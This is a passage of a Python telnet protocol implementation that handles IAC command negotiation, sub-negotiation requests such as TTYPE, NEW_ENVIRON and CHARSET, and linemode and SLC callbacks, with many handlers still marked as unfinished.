SLC_FLUSHIN not supported, requires SYNCH (urgent TCP).\n pass\n if slc_def.flushout:\n # XXX\n # We must call transport.pause_writing, create a new send\n # buffer without incompleted IAC bytes, call\n # discard_output, write new buffer, then resume_writing\n pass\n # allow caller to know which SLC function caused linemode\n # to process, even though CR was not yet discovered.\n self.slc_received = slc_name\n if callback is not None:\n callback(slc_name)\n else:\n # standard inband data\n return\n if not self._xmit and self.xon_any and not self.is_oob:\n # any key after XOFF enables XON\n self._slc_callback[SLC_XON]()\n\n def write(self, data, oob=False):\n \"\"\" .. method:: feed_byte(byte : bytes)\n\n Write data bytes to transport end connected to stream reader.\n Bytes matching IAC (\\xff) is escabed by IAC IAC, unless oob=True.\n \"\"\"\n # All standard telnet bytes, and bytes within an (IAC SB), (IAC SE)\n # sub-negotiation buffer must always be escaped.\n #\n # 8-bit ASCII data values greater than 128 cannot be sent inband\n # unless WILL BINARY ('outbinary') has been agreed, or ``oob``\n # is ``True``.\n #\n # If ``oob`` is set ``True``, data is considered\n # out-of-band and may set high bit.\n assert isinstance(data, (bytes, bytearray)), repr(data)\n if not oob and not self.local_option.enabled(BINARY):\n for pos, byte in enumerate(data):\n assert byte < 128, (\n 'character value {} at pos {} not valid, send '\n 'IAC WILL BINARY first: {}'.format(byte, pos, data))\n self.transport.write(escape_iac(data))\n\n def send_iac(self, data):\n \"\"\" .. method: send_iac(self, data : bytes)\n\n No transformations of bytes are performed, Only complete\n IAC commands are legal.\n \"\"\"\n assert isinstance(data, (bytes, bytearray)), data\n assert data and data.startswith(IAC), data\n self.transport.write(data)\n\n def iac(self, cmd, opt=None):\n \"\"\" .. method: iac(self, cmd : bytes, opt : bytes)\n\n Send Is-A-Command (IAC) 2 or 3-byte command option.\n\n Returns True if the command was actually sent. Not all commands\n are legal in the context of client, server, or negotiation state,\n emitting a relevant debug warning to the log handler.\n \"\"\"\n short_iacs = (DM, )\n assert (cmd in (DO, DONT, WILL, WONT)\n or cmd in short_iacs and opt is None), (\n 'Uknown IAC {}.'.format(_name_command(cmd)))\n if opt == LINEMODE:\n if cmd == DO and not self.is_server:\n raise ValueError('DO LINEMODE may only be sent by server.')\n if cmd == WILL and self.is_server:\n raise ValueError('WILL LINEMODE may only be sent by client.')\n if cmd == DO: # XXX any exclusions ?\n if self.remote_option.enabled(opt):\n self.log.debug('skip {} {}; remote_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n if cmd in (DO, WILL):\n if self.pending_option.enabled(cmd + opt):\n self.log.debug('skip {} {}; pending_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n self.pending_option[cmd + opt] = True\n if cmd == WILL and opt != TM:\n if self.local_option.enabled(opt):\n self.log.debug('skip {} {}; local_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n return False\n if cmd == DONT and opt not in (LOGOUT,): # XXX any other exclusions?\n if self.remote_option.enabled(opt):\n # warning: some implementations incorrectly reply (DONT, opt),\n # for an option we already said we WONT. This would cause\n # telnet loops for implementations not doing state tracking!\n self.log.debug('skip {} {}; remote_option = True'.format(\n _name_command(cmd), _name_command(opt)))\n self.remote_option[opt] = False\n elif cmd == WONT:\n self.local_option[opt] = False\n if cmd in short_iacs:\n self.send_iac(IAC + cmd)\n else:\n self.send_iac(IAC + cmd + opt)\n self.log.debug('send IAC {}'.format(_name_command(cmd),\n ' {}'.format(_name_command(opt)) if cmd in short_iacs else ''))\n\n# Public methods for notifying about, soliciting, or advertising state options.\n#\n def send_ga(self):\n \"\"\" .. method:: send_ga() -> bool\n\n Send IAC GA (Go-Ahead) only if IAC DONT SGA was received.\n Clients wishing to receive GA should send (DONT SGA). Returns\n True if GA was sent.\n \"\"\"\n # Only a few 1970-era hosts require GA (AMES-67, UCLA-CON). The GA\n # signal is very useful for scripting, such as an 'expect'-like\n # program flow, or for MUDs, indicating that the last-most received\n # line is a prompt. Another example of GA is a nethack server\n # (alt.nethack.org), that indicates to ai bots that it has received\n # all screen updates.\n #\n if not self.local_option.enabled(SGA):\n self.send_iac(IAC + GA)\n return True\n\n\n\n def request_status(self):\n \"\"\" .. method:: request_status() -> bool\n\n Send STATUS, SEND sub-negotiation, rfc859.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n # Does nothing if (WILL, STATUS) has not yet been received,\n # or an existing SB STATUS SEND request is already pending.\n if not self.remote_option.enabled(STATUS):\n pass\n if not self.pending_option.enabled(SB + STATUS):\n self.pending_option[SB + STATUS] = True\n self.send_iac(\n b''.join([IAC, SB, STATUS, SEND, IAC, SE]))\n # set pending for SB STATUS\n self.pending_option[SB + STATUS] = True\n return True\n\n def request_tspeed(self):\n \"\"\" .. method:: request_tspeed() -> bool\n\n Send TSPEED, SEND sub-negotiation, rfc1079.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n # Does nothing if (WILL, TSPEED) has not yet been received.\n # or an existing SB TSPEED SEND request is already pending. \"\"\"\n if not self.remote_option.enabled(TSPEED):\n pass\n if not self.pending_option.enabled(SB + TSPEED):\n self.pending_option[SB + TSPEED] = True\n response = [IAC, SB, TSPEED, SEND, IAC, SE]\n self.log.debug('send: IAC SB TSPEED SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def request_charset(self, codepages=None, sep=' '):\n \"\"\" .. method:: request_charset(codepages : list, sep : string) -> bool\n\n Request sub-negotiation CHARSET, rfc 2066.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\" # TODO: find client that works!\n # At least some modern MUD clients and popular asian telnet BBS\n # systems use CHARSET, and reply 'UTF-8' (or 'GBK',). \"\"\"\n if not self.remote_option.enabled(CHARSET):\n pass\n (REQUEST, ACCEPTED, REJECTED, TTABLE_IS, TTABLE_REJECTED,\n TTABLE_ACK, TTABLE_NAK) = (bytes([const]) for const in range(1, 8))\n if not self.pending_option.enabled(SB + CHARSET):\n self.pending_option[SB + CHARSET] = True\n response = [IAC, SB, CHARSET, REQUEST]\n response.extend(bytes(sep.join(codepages), 'ascii'))\n response.extend([IAC, SE])\n self.log.debug('send: IAC SB CHARSET REQUEST {} IAC SE'.format(\n sep.join(codepages)))\n self.send_iac(b''.join(response))\n return True\n\n\n def request_env(self, env=None):\n \"\"\" .. method:: request_env(env : list) -> bool\n\n Request sub-negotiation NEW_ENVIRON, rfc 1572.\n Returns True if request is valid for telnet state, and was sent.\n\n ``env`` is list ascii uppercase keys of values requested. Default\n value is when unset is instance attribute ``_default_env_request``.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n # May only be requested by the server end. Sends IAC SB ``kind``\n # SEND IS sub-negotiation, rfc1086, using list of ascii string\n # values ``self._default_env_request``, which is mostly variables\n # for impl.-specific extensions, such as TERM type, or USER for auth.\n request_ENV = self._default_env_request if env is None else env\n assert self.is_server\n kind = NEW_ENVIRON\n if not self.remote_option.enabled(kind):\n self.log.debug('cannot send SB {} SEND IS '\n 'without receipt of WILL {}'.format(\n _name_command(kind), _name_command(kind)))\n return False\n if self.pending_option.enabled(SB + kind + SEND + IS):\n self.log.debug('cannot send SB {} SEND IS, '\n 'request pending.'.format(_name_command(kind)))\n return False\n self.pending_option[SB + kind + SEND + IS] = True\n response = collections.deque()\n response.extend([IAC, SB, kind, SEND, IS])\n for idx, env in enumerate(request_ENV):\n response.extend([bytes(char, 'ascii') for char in env])\n if idx < len(request_ENV) - 1:\n response.append(theNULL)\n response.extend([b'\\x03', IAC, SE])\n self.log.debug('send: {!r}'.format(b''.join(response)))\n self.send_iac(b''.join(response))\n return True\n\n def request_xdisploc(self):\n \"\"\" .. method:: request_xdisploc() -> bool\n\n Send XDISPLOC, SEND sub-negotiation, rfc1086.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if not self.remote_option.enabled(XDISPLOC):\n pass\n if not self.pending_option.enabled(SB + XDISPLOC):\n self.pending_option[SB + XDISPLOC] = True\n response = [IAC, SB, XDISPLOC, SEND, IAC, SE]\n self.log.debug('send: IAC SB XDISPLOC SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def request_ttype(self):\n \"\"\" .. method:: request_ttype() -> bool\n\n Send TTYPE SEND sub-negotiation, rfc930.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if not self.remote_option.enabled(TTYPE):\n pass\n if not self.pending_option.enabled(SB + TTYPE):\n self.pending_option[SB + TTYPE] = True\n response = [IAC, SB, TTYPE, SEND, IAC, SE]\n self.log.debug('send: IAC SB TTYPE SEND IAC SE')\n self.send_iac(b''.join(response))\n return True\n\n def send_eor(self):\n \"\"\" .. method:: request_eor() -> bool\n\n Send IAC EOR_CMD (End-of-Record) only if IAC DO EOR was received.\n Returns True if request is valid for telnet state, and was sent.\n \"\"\"\n if not self.local_option.enabled(EOR):\n self.send_iac(IAC + EOR_CMD)\n\n def send_lineflow_mode(self):\n \"\"\" .. method send_lineflow_mod() -> bool\n\n Send LFLOW mode sub-negotiation, rfc1372.\n \"\"\"\n if not self.remote_option.enabled(LFLOW):\n return\n mode = LFLOW_RESTART_ANY if self.xon_any else LFLOW_RESTART_XON\n desc = 'LFLOW_RESTART_ANY' if self.xon_any else 'LFLOW_RESTART_XON'\n self.send_iac(b''.join([IAC, SB, LFLOW, mode, IAC, SE]))\n self.log.debug('send: IAC SB LFLOW %s IAC SE', desc)\n\n def send_linemode(self, linemode=None):\n \"\"\" Request the client switch to linemode ``linemode``, an\n of the Linemode class, or self._linemode by default.\n \"\"\"\n assert self.is_server, (\n 'SB LINEMODE LMODE_MODE cannot be sent by client')\n assert self.remote_option.enabled(LINEMODE), (\n 'SB LINEMODE LMODE_MODE cannot be sent; '\n 'WILL LINEMODE not received.')\n if linemode is not None:\n self.log.debug('Linemode is %s', linemode)\n self._linemode = linemode\n self.send_iac(IAC + SB + LINEMODE\n + LMODE_MODE + self._linemode.mask\n + IAC + SE)\n self.log.debug('sent IAC SB LINEMODE MODE %s IAC SE', self._linemode)\n\n def request_forwardmask(self, fmask=None):\n \"\"\" Request the client forward the control characters indicated\n in the Forwardmask class instance ``fmask``. When fmask is\n None, a forwardmask is generated for the SLC characters registered\n in the SLC tab, ``_slctab``.\n \"\"\"\n assert self.is_server, (\n 'DO FORWARDMASK may only be sent by server end')\n assert self.remote_option.enabled(LINEMODE), (\n 'cannot send DO FORWARDMASK without receipt of WILL LINEMODE.')\n if fmask is None:\n fmask = self._generate_forwardmask()\n assert isinstance(fmask, Forwardmask), fmask\n sb_cmd = LINEMODE + DO + LMODE_FORWARDMASK + escape_iac(fmask.value)\n self.log.debug('send IAC SB LINEMODE DO LMODE_FORWARDMASK::')\n for maskbit_descr in fmask.__repr__():\n self.log.debug(' %s', maskbit_descr)\n self.send_iac(IAC + SB + sb_cmd + IAC + SE)\n self.pending_option[SB + LINEMODE] = True\n\n# Public is-a-command (IAC) callbacks\n#\n def set_iac_callback(self, cmd, func):\n \"\"\" Register callable ``func`` as callback for IAC ``cmd``.\n\n BRK, IP, AO, AYT, EC, EL, EOR_CMD, EOF, SUSP, ABORT, and NOP.\n\n These callbacks receive a single argument, the IAC ``cmd`` which\n triggered it.\n \"\"\"\n assert callable(func), ('Argument func must be callable')\n assert cmd in (BRK, IP, AO, AYT, EC, EL, EOR_CMD, EOF, SUSP,\n ABORT, NOP, DM, GA), cmd\n self._iac_callback[cmd] = func\n\n def handle_nop(self, cmd):\n \"\"\" XXX Handle IAC No-Operation (NOP)\n \"\"\"\n self.log.debug('IAC NOP: Null Operation')\n\n def handle_ga(self, cmd):\n \"\"\" XXX Handle IAC Go-Ahead (GA)\n \"\"\"\n self.log.debug('IAC GA: Go-Ahead')\n\n def handle_dm(self, cmd):\n \"\"\" XXX Handle IAC Data-Mark (DM)\n\n Callback sets ``self._dm_recv``. when IAC + DM is received.\n The TCP transport is not tested for OOB/TCP Urgent, so an old\n teletype half-duplex terminal may inadvertantly send unintended\n control sequences up until now,\n\n Oh well. \"\"\"\n self.log.debug('IAC DM: received')\n #: ``True`` if the last byte sent to ``feed_byte()`` was the end\n # of an *IAC DM* has been received. MSG_OOB not implemented, so\n # this mechanism _should not be implmeneted_.\n self._dm_recv = True\n #self.iac(DM)\n\n# Public mixed-mode SLC and IAC callbacks\n#\n def handle_el(self, byte):\n \"\"\" XXX Handle IAC Erase Line (EL) or SLC_EL.\n\n Provides a function which discards all the data ready on current\n line of input. The prompt should be re-displayed.\n \"\"\"\n self.log.debug('IAC EL: Erase Line')\n\n def handle_eor(self, byte):\n \"\"\" XXX Handle IAC End of Record (EOR_CMD) or SLC_EOR.\n \"\"\"\n self.log.debug('IAC EOR_CMD: End of Record')\n\n def handle_abort(self, byte):\n \"\"\" XXX Handle IAC Abort (ABORT) rfc1184, or SLC_ABORT.\n\n Similar to Interrupt Process (IP), but means only to abort or\n terminate the process to which the NVT is connected.\n \"\"\"\n self.log.debug('IAC ABORT: Abort')\n\n def handle_eof(self, byte):\n \"\"\" XXX Handle End of Record (IAC, EOF), rfc1184 or SLC_EOF.\n \"\"\"\n self.log.debug('IAC EOF: End of File')\n\n def handle_susp(self, byte):\n \"\"\" XXX Handle Suspend Process (SUSP), rfc1184 or SLC_SUSP.\n\n Suspends the execution of the current process attached to the NVT\n in such a way that another process will take over control of the\n NVT, and the suspended process can be resumed at a later time.\n \"\"\"\n # If the receiving system does not support this functionality, it\n # should be ignored.\n self.log.debug('IAC SUSP: Suspend')\n\n def handle_brk(self, byte):\n \"\"\" XXX Handle IAC Break (BRK) or SLC_BRK (Break).\n\n Sent by clients to indicate BREAK keypress. This is not the same\n as IP (^c), but a means to map sysystem-dependent break key such\n as found on an IBM Systems.\n \"\"\"\n self.log.debug('IAC BRK: Break')\n\n def handle_ayt(self, byte):\n \"\"\" XXX Handle IAC Are You There (AYT) or SLC_AYT.\n\n Provides the user with some visible (e.g., printable) evidence\n that the system is still up and running.\n \"\"\"\n # Terminal servers that respond to AYT usually print the status\n # of the client terminal session, its speed, type, and options.\n self.log.debug('IAC AYT: Are You There?')\n\n def handle_ip(self, byte):\n \"\"\" XXX Handle IAC Interrupt Process (IP) or SLC_IP\n \"\"\"\n self.log.debug('IAC IP: Interrupt Process')\n\n def handle_ao(self, byte):\n \"\"\" XXX Handle IAC Abort Output (AO) or SLC_AO.\n\n Discards any remaining output on the transport buffer.\n \"\"\"\n # \"If the AO were received [...] a reasonable implementation would\n # be to suppress the remainder of the text string, *but transmit the\n # prompt character and the preceding *.\"\n # XXX TODO: Must netsend()\n self.log.debug('IAC AO: Abort Output')\n pass\n #self.stream.discard_output()\n\n def handle_xon(self, byte):\n \"\"\" XXX handle Transmit-On (IAC, XON) or SLC_XON.\n\n Pauses writing to the transport.\n \"\"\"\n self.log.debug('IAC XON: Transmit On')\n self._xmit = True\n self.transport.resume_writing()\n\n def handle_ec(self, byte):\n \"\"\" XXX Handle IAC + SLC or SLC_EC (Erase Character).\n\n Provides a function which deletes the last preceding undeleted\n character from data ready on current line of input.\n \"\"\"\n self.log.debug('IAC EC: Erase Character')\n\n# public Special Line Mode (SLC) callbacks\n#\n def set_slc_callback(self, slc, func):\n \"\"\" Register ``func`` as callbable for receipt of SLC character\n negotiated for the SLC command ``slc`` in ``_slc_callback``,\n keyed by ``slc`` and valued by its handling function.\n\n SLC_SYNCH, SLC_BRK, SLC_IP, SLC_AO, SLC_AYT, SLC_EOR, SLC_ABORT,\n SLC_EOF, SLC_SUSP, SLC_EC, SLC_EL, SLC_EW, SLC_RP, SLC_XON,\n SLC_XOFF, (...)\n\n These callbacks receive a single argument: the SLC function\n byte that fired it. Some SLC and IAC functions are intermixed;\n which signalling mechanism used by client can be tested by\n evaulating this argument.\n \"\"\"\n assert callable(func), ('Argument func must be callable')\n assert (type(slc) == bytes and\n 0 < ord(slc) < NSLC + 1), ('Uknown SLC byte: %r' % (slc,))\n self._slc_callback[slc] = func\n\n def handle_ew(self, slc):\n \"\"\" XXX Handle SLC_EW (Erase Word).\n\n Provides a function which deletes the last preceding undeleted\n character, and any subsequent bytes until next whitespace character\n from data ready on current line of input.\n \"\"\"\n self.log.debug('IAC EC: Erase Word')\n\n def handle_rp(self, slc):\n \"\"\" Handle SLC Repaint.\n \"\"\" # XXX\n self.log.debug('SLC RP: Repaint')\n\n def handle_lnext(self, slc):\n \"\"\" Handle SLC LINE NEXT?\n \"\"\" # XXX\n self.log.debug('IAC LNEXT: Line Next')\n\n def handle_xoff(self, slc):\n \"\"\" Called when SLC_XOFF is received.\n \"\"\"\n self.log.debug('IAC XOFF: Transmit Off')\n self._xmit = False\n self.transport.pause_writing()\n\n# public Telnet extension callbacks\n#\n def set_ext_callback(self, cmd, func):\n \"\"\" Register ``func`` as callback for subnegotiation result of ``cmd``.\n\n cmd must be one of: TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON, or NAWS.\n\n These callbacks may receive a number of arguments.\n\n Callbacks for ``TTYPE`` and ``XDISPLOC`` receive a single argument\n as a bytestring. ``NEW_ENVIRON`` receives a single argument as\n dictionary. ``NAWS`` receives two integer arguments (width, height),\n and ``TSPEED`` receives two integer arguments (rx, tx).\n \"\"\"\n assert cmd in (TTYPE, TSPEED, XDISPLOC,\n NEW_ENVIRON, NAWS, LOGOUT, CHARSET, SNDLOC), cmd\n assert callable(func), ('Argument func must be callable')\n self._ext_callback[cmd] = func\n\n def handle_xdisploc(self, xdisploc):\n \"\"\" XXX Receive XDISPLAY value ``xdisploc``, rfc1096.\n\n xdisploc string format is ':[.]'.\n \"\"\"\n self.log.debug('X Display is {}'.format(xdisploc))\n\n def handle_sndloc(self, location):\n \"\"\" XXX Receive LOCATION value ``location``, rfc779.\n \"\"\"\n self.log.debug('Location is {}'.format(location))\n\n def handle_ttype(self, ttype):\n \"\"\" XXX Receive TTYPE value ``ttype``, rfc1091.\n\n Often value of TERM, or analogous to client's emulation capability,\n common values for non-posix client replies are 'VT100', 'VT102',\n 'ANSI', 'ANSI-BBS', or even a mud client identifier. RFC allows\n subsequent requests, the client may solicit multiple times, and\n the client indicates 'end of list' by cycling the return value.\n\n Some example values: VT220, VT100, IBM-3278-(2 through 5),\n ANSITERM, ANSI, TTY, and 5250.\n \"\"\"\n self.log.debug('Terminal type is %r', ttype)\n\n def handle_naws(self, width, height):\n \"\"\" XXX Receive window size ``width`` and ``height``, rfc1073\n \"\"\"\n self.log.debug('Terminal cols=%d, rows=%d', width, height)\n\n def handle_env(self, env):\n \"\"\" XXX Receive environment variables as dict, rfc1572\n negotiation, as dictionary.\n \"\"\"\n self.log.debug('env=%r', env)\n\n def handle_tspeed(self, rx, tx):\n \"\"\" XXX Receive terminal speed from TSPEED as int, rfc1079\n \"\"\"\n self.log.debug('Terminal Speed rx:%d, tx:%d', rx, tx)\n\n\n def handle_location(self, location):\n \"\"\" XXX Handle (IAC, SB, SNDLOC, , IAC, SE), RFC 779.\n \"\"\"\n self.log.debug('Terminal Location:%s', location)\n\n def handle_logout(self, cmd):\n \"\"\" XXX Handle (IAC, (DO | DONT | WILL | WONT), LOGOUT), RFC 727.\n\n Only the server end may receive (DO, DONT).\n Only the client end may receive (WILL, WONT).\n \"\"\"\n # Close the transport on receipt of DO, Reply DONT on receipt\n # of WILL. Nothing is done on receipt of DONT or WONT LOGOFF.\n if cmd == DO:\n self.log.info('client requests DO LOGOUT')\n self.transport.close()\n elif cmd == DONT:\n self.log.info('client requests DONT LOGOUT')\n elif cmd == WILL:\n self.log.debug('recv WILL TIMEOUT (timeout warning)')\n self.log.debug('send IAC DONT LOGOUT')\n self.iac(DONT, LOGOUT)\n elif cmd == WONT:\n self.log.info('recv IAC WONT LOGOUT (server refuses logout')\n\n# public derivable methods DO, DONT, WILL, and WONT negotiation\n#\n def handle_do(self, opt):\n \"\"\" XXX Process byte 3 of series (IAC, DO, opt) received by remote end.\n\n This method can be derived to change or extend protocol capabilities.\n The result of a supported capability is a response of (IAC, WILL, opt)\n and the setting of ``self.local_option[opt]`` of ``True``.\n \"\"\"\n # For unsupported capabilities, RFC specifies a response of\n # (IAC, WONT, opt). Similarly, set ``self.local_option[opt]``\n # to ``False``.\n #\n # This method returns True if the opt enables the willingness of the\n # remote end to accept a telnet capability, such as NAWS. It returns\n # False for unsupported option, or an option invalid in that context,\n # such as LOGOUT.\n self.log.debug('handle_do(%s)' % (_name_command(opt)))\n if opt == ECHO and not self.is_server:\n self.log.warn('cannot recv DO ECHO on client end.')\n elif opt == LINEMODE and self.is_server:\n self.log.warn('cannot recv DO LINEMODE on server end.')\n elif opt == LOGOUT and self.is_server:\n self.log.warn('cannot recv DO LOGOUT on client end')\n elif opt == TM:\n self.iac(WILL, TM)\n elif opt == LOGOUT:\n self._ext_callback[LOGOUT](DO)\n elif opt in (ECHO, LINEMODE, BINARY, SGA, LFLOW, EXOPL, EOR):\n if not self.local_option.enabled(opt):\n self.iac(WILL, opt)\n return True\n elif opt == STATUS:\n if not self.local_option.enabled(opt):\n self.iac(WILL, STATUS)\n self._send_status()\n return True\n else:\n if self.local_option.get(opt, None) is None:\n self.iac(WONT, opt)\n self.log.warn('Unhandled: DO %s.' % (_name_command(opt),))\n return False\n\n def handle_dont(self, opt):\n \"\"\" Process byte 3 of series (IAC, DONT, opt) received by remote end.\n\n This only results in ``self.local_option[opt]`` set to ``False``, with\n the exception of (IAC, DONT, LOGOUT), which only signals a callback\n to ``handle_logout(DONT)``.\n \"\"\"\n self.log.debug('handle_dont(%s)' % (_name_command(opt)))\n if opt == LOGOUT:\n assert self.is_server, ('cannot recv DONT LOGOUT on server end')\n self._ext_callback[LOGOUT](DONT)\n return\n # many implementations (wrongly!) sent a WONT in reply to DONT. It\n # sounds reasonable, but it can and will cause telnet loops. (ruby?)\n # Correctly, a DONT can not be declined, so there is no need to\n # affirm in the negative.\n self.local_option[opt] = False\n\n def handle_will(self, opt):\n \"\"\" Process byte 3 of series (IAC, DONT, opt) received by remote end.\n\n The remote end requests we perform any number of capabilities. Most\n implementations require an answer in the affirmative with DO, unless\n DO has meaning specific for only client or server end, and\n dissenting with DONT.\n\n WILL ECHO is only legally received _for clients_, answered with DO.\n WILL NAWS is only legally received _for servers_, answered with DO.\n BINARY and SGA are answered with DO. STATUS, NEW_ENVIRON, XDISPLOC,\n and TTYPE is answered with sub-negotiation SEND. The env variables\n requested in response to WILL NEW_ENVIRON is specified by list\n ``self._default_env_request``. All others are replied with DONT.\n\n The result of a supported capability is a response of (IAC, DO, opt)\n and the setting of ``self.remote_option[opt]`` of ``True``. For\n unsupported capabilities, RFC specifies a response of (IAC, DONT, opt).\n Similarly, set ``self.remote_option[opt]`` to ``False``. \"\"\"\n self.log.debug('handle_will(%s)' % (_name_command(opt)))\n if opt in (BINARY, SGA, ECHO, NAWS, LINEMODE, EOR, SNDLOC):\n if opt == ECHO and self.is_server:\n raise ValueError('cannot recv WILL ECHO on server end')\n if opt in (NAWS, LINEMODE, SNDLOC) and not self.is_server:\n raise ValueError('cannot recv WILL %s on client end' % (\n _name_command(opt),))\n if not self.remote_option.enabled(opt):\n self.remote_option[opt] = True\n self.iac(DO, opt)\n if opt in (NAWS, LINEMODE, SNDLOC):\n self.pending_option[SB + opt] = True\n if opt == LINEMODE:\n # server sets the initial mode and sends forwardmask,\n self.send_linemode(self._default_linemode)\n elif opt == TM:\n if opt == TM and not self.pending_option.enabled(DO + TM):\n raise ValueError('cannot recv WILL TM, must first send DO TM.')\n self.log.debug('WILL TIMING-MARK')\n self.pending_option[DO + TM] = False\n elif opt == LOGOUT:\n if opt == LOGOUT and not self.is_server:\n raise ValueError('cannot recv WILL LOGOUT on server end')\n self._ext_callback[LOGOUT](WILL)\n elif opt == STATUS:\n self.remote_option[opt] = True\n self.request_status()\n elif opt == LFLOW:\n if opt == LFLOW and not self.is_server:\n raise ValueError('WILL LFLOW not supported on client end')\n self.remote_option[opt] = True\n self.send_lineflow_mode()\n elif opt == NEW_ENVIRON:\n self.remote_option[opt] = True\n self.request_env()\n elif opt == CHARSET:\n self.remote_option[opt] = True\n self.request_charset()\n elif opt == XDISPLOC:\n if opt == XDISPLOC and not self.is_server:\n raise ValueError('cannot recv WILL XDISPLOC on client end')\n self.remote_option[opt] = True\n self.request_xdisploc()\n elif opt == TTYPE:\n if opt == TTYPE and not self.is_server:\n raise ValueError('cannot recv WILL TTYPE on client end')\n self.remote_option[opt] = True\n self.request_ttype()\n elif opt == TSPEED:\n self.remote_option[opt] = True\n self.request_tspeed()\n else:\n self.remote_option[opt] = False\n self.iac(DONT, opt)\n raise ValueError('Unhandled: WILL %s.' % (_name_command(opt),))\n\n def handle_wont(self, opt):\n \"\"\" Process byte 3 of series (IAC, WONT, opt) received by remote end.\n\n (IAC, WONT, opt) is a negative acknolwedgement of (IAC, DO, opt) sent.\n\n The remote end requests we do not perform a telnet capability.\n\n It is not possible to decline a WONT. ``T.remote_option[opt]`` is set\n False to indicate the remote end's refusal to perform ``opt``.\n \"\"\"\n self.log.debug('handle_wont(%s)' % (_name_command(opt)))\n if opt == TM and not self.pending_option.enabled(DO + TM):\n raise ValueError('WONT TM received but DO TM was not sent')\n elif opt == TM:\n self.log.debug('WONT TIMING-MARK')\n self.pending_option[DO + TM] = False\n elif opt == LOGOUT:\n assert not (self.is_server), (\n 'cannot recv WONT LOGOUT on server end')\n if not self.pending_option(DO + LOGOUT):\n self.log.warn('Server sent WONT LOGOUT unsolicited')\n self._ext_callback[LOGOUT](WONT)\n else:\n self.remote_option[opt] = False\n\n# public derivable Sub-Negotation parsing\n#\n def handle_subnegotiation(self, buf):\n \"\"\" Callback for end of sub-negotiation buffer.\n\n SB options handled here are TTYPE, XDISPLOC, NEW_ENVIRON,\n NAWS, and STATUS, and are delegated to their ``handle_``\n equivalent methods. Implementors of additional SB options\n should extend this method.\n \"\"\"\n # Changes to the default responses should replace the\n # default callbacks ``handle_ttype``, ``handle_xdisploc``,\n # ``handle_env``, and ``handle_naws``, by using\n # ``set_ext_callback(opt_byte, func)``.\n #\n assert buf, ('SE: buffer empty')\n assert buf[0] != theNULL, ('SE: buffer is NUL')\n assert len(buf) > 1, ('SE: buffer too short: %r' % (buf,))\n cmd = buf[0]\n if self.is_server:\n assert cmd in (LINEMODE, LFLOW, NAWS, SNDLOC,\n NEW_ENVIRON, TTYPE, TSPEED, XDISPLOC, STATUS), _name_command(cmd)\n if self.pending_option.enabled(SB + cmd):\n self.pending_option[SB + cmd] = False\n else:\n self.log.debug('[SB + %s] unsolicited', _name_command(cmd))\n if cmd == LINEMODE: self._handle_sb_linemode(buf)\n elif cmd == LFLOW:\n self._handle_sb_lflow(buf)\n elif cmd == NAWS:\n self._handle_sb_naws(buf)\n elif cmd == SNDLOC:\n self._handle_sb_sndloc(buf)\n elif cmd == NEW_ENVIRON:\n self._handle_sb_env(buf)\n elif (cmd, buf[1]) == (TTYPE, IS):\n self._handle_sb_ttype(buf)\n elif (cmd, buf[1]) == (TSPEED, IS):\n self._handle_sb_tspeed(buf)\n elif (cmd, buf[1]) == (XDISPLOC, IS):\n self._handle_sb_xdisploc(buf)\n elif (cmd, buf[1]) == (STATUS, SEND):\n self._send_status()\n else:\n raise ValueError('SE: unhandled: %r' % (buf,))\n\n# LINEMODE and SLC-related public methods\n#\n def set_default_linemode(self, lmode=None):\n \"\"\" Set the initial line mode requested by the server if client\n supports LINEMODE negotiation. The default is::\n Linemode(bytes(\n ord(LMODE_MODE_REMOTE) | ord(LMODE_MODE_LIT_ECHO)))\n which indicates remote editing, and control characters (\\b)\n are displayed to the client terminal without transposing,\n such that \\b is written to the client screen, and not '^G'.\n \"\"\"\n assert lmode is None or isinstance(lmode, Linemode), lmode\n if lmode is None:\n self._default_linemode = Linemode(bytes([\n ord(LMODE_MODE_REMOTE) | ord(LMODE_MODE_LIT_ECHO)]))\n else:\n self._default_linemode = lmode\n\n# Private sub-negotiation (SB) routines\n#\n def _handle_sb_tspeed(self, buf):\n assert buf.popleft() == TSPEED\n assert buf.popleft() == IS\n rx, tx = str(), str()\n while len(buf):\n value = buf.popleft()\n if value == b',':\n break\n rx += value.decode('ascii')\n while len(buf):\n value = buf.popleft()\n if value == b',':\n break\n tx += value.decode('ascii')\n self.log.debug('sb_tspeed: %s, %s', rx, tx)\n self._ext_callback[TSPEED](int(rx), int(tx))\n\n def _handle_sb_xdisploc(self, buf):\n assert buf.popleft() == XDISPLOC\n assert buf.popleft() == IS\n xdisploc_str = b''.join(buf).decode('ascii')\n self.log.debug('sb_xdisploc: %s', xdisploc_str)\n self._ext_callback[XDISPLOC](xdisploc_str)\n\n def _handle_sb_ttype(self, buf):\n assert buf.popleft() == TTYPE\n assert buf.popleft() == IS\n ttype_str = b''.join(buf).decode('ascii')\n self.log.debug('sb_ttype: %s', ttype_str)\n self._ext_callback[TTYPE](ttype_str)\n\n def _handle_sb_env(self, buf):\n assert len(buf) > 2, ('SE: buffer too short: %r' % (buf,))\n kind = buf.popleft()\n opt = buf.popleft()\n assert opt in (IS, INFO, SEND), opt\n assert kind == NEW_ENVIRON\n if opt == SEND:\n self._handle_sb_env_send(buf)\n if opt in (IS, INFO):\n assert self.is_server, ('SE: cannot recv from server: %s %s' % (\n _name_command(kind), 'IS' if opt == IS else 'INFO',))\n if opt == IS:\n if not self.pending_option.enabled(SB + kind + SEND + IS):\n self.log.debug('%s IS unsolicited', _name_command(opt))\n self.pending_option[SB + kind + SEND + IS] = False\n if self.pending_option.get(SB + kind + SEND + IS, None) is False:\n # a pending option of value of 'False' means it previously\n # completed, subsequent environment values should have been\n # send as INFO ..\n self.log.debug('%s IS already recv; expected INFO.',\n _name_command(kind))\n breaks = list([idx for (idx, byte) in enumerate(buf)\n if byte in (theNULL, b'\\x03')])\n env = {}\n for start, end in zip(breaks, breaks[1:]):\n # not the best looking code, how do we splice & split bytes ..?\n decoded = bytes([ord(byte) for byte in buf]).decode('ascii')\n 